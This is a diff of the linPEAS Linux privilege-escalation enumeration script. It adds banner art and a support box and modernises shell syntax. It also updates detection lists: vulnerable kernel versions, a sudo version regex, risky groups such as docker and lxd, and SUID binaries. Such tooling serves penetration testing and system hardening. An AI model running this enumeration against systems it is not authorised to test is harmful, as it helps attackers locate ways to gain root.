\e[48;2;73;218;37m\e[38;2;73;216;37m▄\e[48;2;73;217;37m\e[38;2;93;205;61m▄\e[48;2;79;213;44m\e[38;2;121;189;95m▄\e[48;2;85;210;51m\e[38;2;132;184;108m▄\e[48;2;82;211;47m\e[38;2;121;191;93m▄\e[48;2;73;217;37m\e[38;2;85;210;52m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;37;111;20m\e[38;2;71;214;36m▄\e[48;2;1;2;0m\e[38;2;44;128;22m▄\e[48;2;2;4;2m\e[38;2;15;39;8m▄\e[48;2;1;1;1m\e[38;2;29;82;14m▄\e[48;2;13;37;7m\e[38;2;68;204;34m▄\e[48;2;70;210;35m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;74;216;38m▄\e[48;2;82;211;47m\e[38;2;118;191;90m▄\e[48;2;100;200;70m\e[38;2;132;185;108m▄\e[48;2;103;201;72m\e[38;2;127;187;101m▄\e[48;2;98;203;67m\e[38;2;125;189;100m▄\e[48;2;85;209;52m\e[38;2;116;192;88m▄\e[48;2;73;217;37m\e[38;2;80;211;44m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;68;200;35m▄\e[48;2;63;170;35m\e[38;2;54;125;36m▄\e[48;2;51;103;38m\e[38;2;51;99;38m▄\e[48;2;49;101;36m\e[38;2;22;45;17m▄\e[48;2;30;47;26m\e[38;2;45;69;39m▄\e[48;2;51;78;45m \e[0m + \e[48;2;51;78;45m \e[48;2;49;75;43m\e[38;2;51;78;45m▄\e[48;2;30;38;27m\e[38;2;39;59;35m▄\e[48;2;63;123;49m\e[38;2;71;110;62m▄\e[48;2;54;121;37m\e[38;2;56;119;40m▄\e[48;2;68;198;37m\e[38;2;60;158;37m▄\e[48;2;73;218;37m\e[38;2;71;216;36m▄\e[48;2;73;217;37m\e[38;2;73;216;38m▄\e[48;2;91;206;58m\e[38;2;110;196;81m▄\e[48;2;122;191;95m\e[38;2;126;188;100m▄\e[48;2;128;186;102m\e[38;2;130;187;104m▄\e[48;2;140;180;116m\e[38;2;128;187;103m▄\e[48;2;126;188;100m\e[38;2;106;197;76m▄\e[48;2;96;202;64m\e[38;2;75;215;39m▄\e[48;2;73;217;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;217;38m\e[38;2;73;217;37m▄\e[48;2;114;194;86m\e[38;2;76;215;40m▄\e[48;2;142;178;121m\e[38;2;94;205;62m▄\e[48;2;150;176;129m\e[38;2;109;196;81m▄\e[48;2;142;180;120m\e[38;2;95;203;63m▄\e[48;2;116;193;88m\e[38;2;76;214;41m▄\e[48;2;78;213;44m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;67;196;36m▄\e[48;2;71;209;37m\e[38;2;60;154;36m▄\e[48;2;59;152;36m\e[38;2;57;138;37m▄\e[48;2;52;110;38m\e[38;2;56;130;37m▄\e[48;2;51;104;38m\e[38;2;30;71;21m▄\e[48;2;20;31;17m\e[38;2;45;69;39m▄\e[48;2;50;78;44m\e[38;2;51;78;45m▄\e[48;2;51;78;45m \e[0m + \e[48;2;51;78;45m\e[38;2;28;43;24m▄\e[48;2;51;78;45m\e[38;2;43;64;38m▄\e[48;2;51;78;45m\e[38;2;52;79;46m▄\e[48;2;34;53;30m\e[38;2;46;71;41m▄\e[48;2;64;124;48m\e[38;2;49;106;36m▄\e[48;2;53;115;38m\e[38;2;57;124;40m▄\e[48;2;63;175;36m\e[38;2;55;126;38m▄\e[48;2;73;217;37m\e[38;2;66;186;36m▄\e[48;2;89;208;56m\e[38;2;73;217;37m▄\e[48;2;111;195;82m\e[38;2;75;215;40m▄\e[48;2;109;197;80m\e[38;2;74;216;38m▄\e[48;2;85;209;52m\e[38;2;73;218;36m▄\e[48;2;73;216;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m\e[38;2;71;214;36m▄\e[48;2;71;212;36m\e[38;2;63;172;36m▄\e[48;2;63;174;35m\e[38;2;57;138;37m▄\e[48;2;58;146;36m\e[38;2;57;137;38m▄\e[48;2;58;139;37m\e[38;2;57;138;37m▄\e[48;2;58;138;37m\e[38;2;54;128;35m▄\e[48;2;50;117;34m\e[38;2;20;44;14m▄\e[48;2;20;32;17m\e[38;2;39;61;34m▄\e[48;2;51;77;44m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;49;75;43m▄\e[0m + \e[48;2;84;151;67m\e[38;2;98;177;78m▄\e[48;2;43;80;34m\e[38;2;98;177;78m▄\e[48;2;22;39;19m\e[38;2;98;178;78m▄\e[48;2;43;67;38m\e[38;2;81;148;64m▄\e[48;2;40;70;33m\e[38;2;44;78;36m▄\e[48;2;54;127;36m\e[38;2;21;47;15m▄\e[48;2;55;120;39m\e[38;2;54;117;39m▄\e[48;2;56;133;37m\e[38;2;59;133;40m▄\e[48;2;71;211;36m\e[38;2;61;164;37m▄\e[48;2;73;217;36m\e[38;2;71;211;36m▄\e[48;2;73;218;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;73;218;37m\e[38;2;67;203;34m▄\e[48;2;68;194;37m\e[38;2;40;116;21m▄\e[48;2;58;142;36m\e[38;2;8;21;5m▄\e[48;2;49;120;31m\e[38;2;6;10;5m▄\e[48;2;25;59;16m\e[38;2;73;108;65m▄\e[48;2;15;33;11m\e[38;2;95;157;79m▄\e[48;2;12;25;9m\e[38;2;97;175;77m▄\e[48;2;21;32;19m\e[38;2;99;179;79m▄\e[48;2;23;35;19m\e[38;2;98;178;78m▄\e[48;2;20;34;17m\e[38;2;98;178;78m▄\e[48;2;13;24;11m\e[38;2;98;178;78m▄\e[48;2;16;26;14m\e[38;2;98;177;78m▄\e[0m + \e[48;2;97;176;77m\e[38;2;58;103;46m▄\e[48;2;98;177;78m\e[38;2;94;170;75m▄\e[48;2;98;177;78m\e[38;2;99;179;79m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;97;176;77m\e[38;2;98;177;78m▄\e[48;2;91;165;72m\e[38;2;98;177;78m▄\e[48;2;55;100;44m\e[38;2;98;177;78m▄\e[48;2;15;27;10m\e[38;2;92;168;73m▄\e[48;2;24;46;18m\e[38;2;76;138;61m▄\e[48;2;73;154;53m\e[38;2;54;96;43m▄\e[48;2;74;213;39m\e[38;2;24;48;18m▄\e[48;2;74;222;37m\e[38;2;20;55;11m▄\e[48;2;73;217;37m\e[38;2;31;91;16m▄\e[48;2;73;218;37m\e[38;2;49;145;24m▄\e[48;2;73;218;37m\e[38;2;68;201;35m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;74;220;37m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;220;37m▄\e[48;2;73;218;37m\e[38;2;72;214;37m▄\e[48;2;73;218;37m\e[38;2;63;187;32m▄\e[48;2;72;217;36m\e[38;2;41;120;22m▄\e[48;2;74;222;36m\e[38;2;21;52;13m▄\e[48;2;67;203;34m\e[38;2;39;62;34m▄\e[48;2;40;117;21m\e[38;2;64;103;54m▄\e[48;2;14;43;7m\e[38;2;72;126;57m▄\e[48;2;4;12;2m\e[38;2;87;156;69m▄\e[48;2;25;45;21m\e[38;2;97;174;78m▄\e[48;2;71;124;57m\e[38;2;99;177;80m▄\e[48;2;97;168;78m\e[38;2;94;170;75m▄\e[48;2;96;175;77m\e[38;2;103;177;84m▄\e[48;2;98;176;79m\e[38;2;109;183;90m▄\e[48;2;100;178;80m\e[38;2;112;185;94m▄\e[48;2;100;177;80m\e[38;2;111;184;92m▄\e[48;2;99;177;80m\e[38;2;107;182;89m▄\e[48;2;98;177;78m\e[38;2;105;182;85m▄\e[48;2;98;177;78m\e[38;2;103;180;83m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[0m + \e[38;2;54;79;47m▀\e[38;2;72;123;60m▀\e[48;2;97;176;78m\e[38;2;65;87;60m▄\e[48;2;98;177;78m\e[38;2;73;130;59m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;96;172;77m\e[38;2;98;177;78m▄\e[48;2;82;147;65m\e[38;2;98;177;78m▄\e[48;2;66;116;52m\e[38;2;98;177;78m▄\e[48;2;46;78;38m\e[38;2;98;177;78m▄\e[48;2;27;51;20m\e[38;2;98;177;78m▄\e[48;2;28;60;20m\e[38;2;94;169;74m▄\e[48;2;28;67;19m\e[38;2;86;155;69m▄\e[48;2;34;96;19m\e[38;2;69;123;54m▄\e[48;2;42;126;21m\e[38;2;48;86;39m▄\e[48;2;51;148;27m\e[38;2;36;64;28m▄\e[48;2;55;164;28m\e[38;2;26;46;20m▄\e[48;2;60;180;30m\e[38;2;23;39;18m▄\e[48;2;62;186;31m\e[38;2;21;40;17m▄\e[48;2;61;181;31m\e[38;2;19;36;16m▄\e[48;2;67;176;40m\e[38;2;18;32;14m▄\e[48;2;63;173;35m\e[38;2;23;36;19m▄\e[48;2;56;168;29m\e[38;2;27;42;23m▄\e[48;2;53;160;27m\e[38;2;29;45;24m▄\e[48;2;44;133;22m\e[38;2;30;53;25m▄\e[48;2;34;102;17m\e[38;2;52;89;43m▄\e[48;2;20;60;10m\e[38;2;88;148;71m▄\e[48;2;24;47;19m\e[38;2;97;171;78m▄\e[48;2;34;62;27m\e[38;2;98;177;78m▄\e[48;2;55;99;44m\e[38;2;98;177;78m▄\e[48;2;80;144;64m\e[38;2;98;177;78m▄\e[48;2;99;176;79m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;99;177;79m\e[38;2;96;172;76m▄\e[48;2;99;175;79m\e[38;2;85;151;68m▄\e[48;2;95;169;76m\e[38;2;72;121;60m▄\e[48;2;109;180;92m\e[38;2;37;57;32m▄\e[48;2;100;159;85m\e[38;2;38;41;36m▄\e[48;2;72;107;62m\e[38;2;74;74;74m▄\e[0m\e[38;2;44;65;38m▀\e[38;2;31;48;27m▀\e[38;2;31;48;26m▀\e[38;2;31;52;25m▀\e[38;2;41;71;34m▀\e[38;2;59;97;50m▀\e[0m + \e[38;2;95;106;94m▀\e[38;2;81;137;65m▀\e[38;2;91;166;73m▀\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[0m\e[38;2;28;50;23m▀\e[38;2;20;22;20m▀\e[0m + \e[38;2;41;52;39m▀\e[38;2;39;76;30m▀\e[38;2;73;136;57m▀\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[0m\e[38;2;53;97;41m▀\e[38;2;24;44;19m▀\e[38;2;36;41;35m▀\e[0m +'"; else - echo " \e[48;5;108m \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;22m \e[48;5;108m \e[48;5;114m \e[48;5;59m \e[49m - \e[48;5;108m \e[48;5;71m \e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m \e[48;5;58m \e[48;5;214m \e[48;5;100m \e[48;5;71m \e[48;5;16m \e[48;5;108m \e[49m - \e[48;5;65m \e[48;5;16m \e[48;5;22m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;65m \e[49m - \e[48;5;65m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;65m \e[49m - \e[48;5;23m \e[48;5;214m \e[48;5;178m \e[48;5;214m \e[48;5;65m \e[49m - \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;94m \e[48;5;136m \e[48;5;214m \e[48;5;65m \e[49m - \e[48;5;58m \e[48;5;214m \e[48;5;172m \e[48;5;64m \e[48;5;77m \e[48;5;71m \e[48;5;65m \e[49m - \e[48;5;16m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;65m \e[49m - \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;65m \e[49m - \e[48;5;65m \e[48;5;77m \e[48;5;71m \e[48;5;16m \e[48;5;77m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[49m - \e[48;5;65m \e[48;5;16m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[48;5;59m \e[48;5;65m \e[49m - \e[48;5;16m \e[48;5;65m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;22m \e[48;5;65m \e[49m - \e[48;5;108m \e[48;5;107m \e[48;5;59m \e[48;5;77m \e[48;5;16m \e[48;5;114m \e[48;5;108m \e[49m" + echo " \e[48;5;108m \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;22m \e[48;5;108m \e[48;5;114m \e[48;5;59m \e[49m + \e[48;5;108m \e[48;5;71m \e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m \e[48;5;58m \e[48;5;214m \e[48;5;100m \e[48;5;71m \e[48;5;16m \e[48;5;108m \e[49m + \e[48;5;65m \e[48;5;16m \e[48;5;22m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;65m \e[49m + \e[48;5;65m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;65m \e[49m + \e[48;5;23m \e[48;5;214m \e[48;5;178m \e[48;5;214m \e[48;5;65m \e[49m + \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;94m \e[48;5;136m \e[48;5;214m \e[48;5;65m \e[49m + \e[48;5;58m \e[48;5;214m \e[48;5;172m \e[48;5;64m \e[48;5;77m \e[48;5;71m \e[48;5;65m \e[49m + \e[48;5;16m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;65m \e[49m + \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;65m \e[49m + \e[48;5;65m \e[48;5;77m \e[48;5;71m \e[48;5;16m \e[48;5;77m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[49m + \e[48;5;65m \e[48;5;16m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[48;5;59m \e[48;5;65m \e[49m + \e[48;5;16m \e[48;5;65m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;22m \e[48;5;65m \e[49m + \e[48;5;108m \e[48;5;107m \e[48;5;59m \e[48;5;77m \e[48;5;16m \e[48;5;114m \e[48;5;108m \e[49m" fi fi } +print_support (){ + printf """ + ${GREEN}/---------------------------------------------------------------------------\\ + | ${BLUE}Do you like PEASS?${GREEN} | + |---------------------------------------------------------------------------| + | ${YELLOW}Become a Patreon${GREEN} : ${RED}https://www.patreon.com/peass${GREEN} | + | ${YELLOW}Follow on Twitter${GREEN} : ${RED}@carlospolopm${GREEN} | + | ${YELLOW}Respect on HTB${GREEN} : ${RED}SirBroccoli & makikvues${GREEN} | + |---------------------------------------------------------------------------| + | ${BLUE}Thank you! ${GREEN} | + \---------------------------------------------------------------------------/ +""" +} + ########################################### #-----------) Starting Output (-----------# ########################################### echo "" -if [ !"$QUIET" ]; then print_banner; fi -printf ${BLUE}" $SCRIPTNAME $VERSION ${YELLOW}by carlospolop\n"$NC; +if [ ! "$QUIET" ]; then print_banner; print_support; fi +printf ${BLUE}" $SCRIPTNAME-$VERSION ${YELLOW}by carlospolop\n"$NC; echo "" -printf ${YELLOW}"ADVISORY: "${BLUE}"$ADVISORY\n"$NC +printf ${YELLOW}"ADVISORY: ${BLUE}$ADVISORY\n$NC" echo "" -printf ${BLUE}"Linux Privesc Checklist: "${YELLOW}"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC +printf ${BLUE}"Linux Privesc Checklist: ${YELLOW}https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW}," echo " RED: You should take a look to it" | sed "s,RED,${SED_RED}," -echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m," +echo " LightCyan: Users with console" | sed "s,LightCyan,${SED_LIGHT_CYAN}," echo " Blue: Users without console & mounted devs" | sed "s,Blue,${SED_BLUE}," echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${SED_GREEN}," -echo " LightMagenta: Your username" | sed "s,LightMagenta,${C}[1;95m&${C}[0m," +echo " LightMagenta: Your username" | sed "s,LightMagenta,${SED_LIGHT_MAGENTA}," if [ "$IAMROOT" ]; then echo "" echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${SED_RED_YELLOW}," @@ -259,16 +281,16 @@ kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2 kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7" -MyUID=`id -u $(whoami)` -if [ `echo $MyUID` ]; then myuid=$MyUID; elif [ `id -u $(whoami) 2>/dev/null` ]; then myuid=`id -u $(whoami) 2>/dev/null`; elif [ `id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1` ]; then myuid=`id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1`; fi +MyUID=$(id -u $(whoami)) +if [ "$MyUID" ]; then myuid=$MyUID; elif [ $(id -u $(whoami) 2>/dev/null) ]; then myuid=$(id -u $(whoami) 2>/dev/null); elif [ "$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1)" ]; then myuid=$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1); fi if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi idB="euid|egid$baduid" sudovB="[01].[012345678].[0-9]+|1.9.[01234]|1.9.5p1" -mounted=`(mount -l || cat /proc/mounts || cat /proc/self/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|'``cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}'` +mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}') if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty mountG="swap|/cdrom|/floppy|/dev/shm" -notmounted=`cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|'`"ImPoSSssSiBlEee" +notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee" mountpermsB="\Wsuid|\Wuser|\Wexec" mountpermsG="nosuid|nouser|noexec" @@ -277,10 +299,10 @@ rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmt groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)" groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)" knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html -mygroups=`groups 2>/dev/null | tr " " "|"` +mygroups=$(groups 2>/dev/null | tr " " "|") # Default Binaries List -sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$" +sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent$|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$" 